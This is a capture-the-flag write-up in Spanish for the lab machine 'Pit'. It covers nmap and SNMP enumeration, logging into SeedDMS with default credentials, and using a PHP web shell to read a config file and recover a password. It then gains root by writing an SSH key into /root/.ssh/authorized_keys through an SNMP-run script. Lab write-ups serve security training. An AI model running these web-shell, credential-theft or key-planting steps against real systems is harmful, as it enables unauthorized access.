# Pit

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.241`

```
Nmap scan report for 10.10.10.241
Host is up (0.069s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
```

`nmap -sU -p 161 -sV -sC -oN udp_nmap.txt 10.10.10.241`

```
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.071s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 4ca7e41263c5985e00000000
|   snmpEngineBoots: 71
|_  snmpEngineTime: 1h02m52s
```

## Enumeración

##### /etc/hosts
```
10.10.10.241    pit.htb dms-pit.htb
```

![1](img/1.png)

`apt-get install snmp-mibs-downloader`
`perl snmpbw.pl 10.10.10.241 public 2 1`

![2](img/2.png)

`cat 10.10.10.241.snmp`

![3](img/3.png)

![4](img/4.png)

`http://dms-pit.htb/seeddms51x/seeddms`

![5](img/5.png)

```
michelle : michelle
```

## Escalada de Privilegios (User)

`view-source:http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml`

```
michelle : ied^ieY6xoquu
```

## Escalada de Privilegios (Root)

`echo "echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIJtoG3+G8oA/l2gtTMiqjNpC1bv8HCZkrGZFT/LroQ root@mcfly' > /root/.ssh/authorized_keys" > /usr/local/monitoring/check.sh`
`cat /usr/local/monitoring/check.sh`

`snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendObjects`
`ssh root@10.10.10.241`

## Referencias
https://github.com/dheiland-r7/snmp \
https://www.exploit-db.com/exploits/47022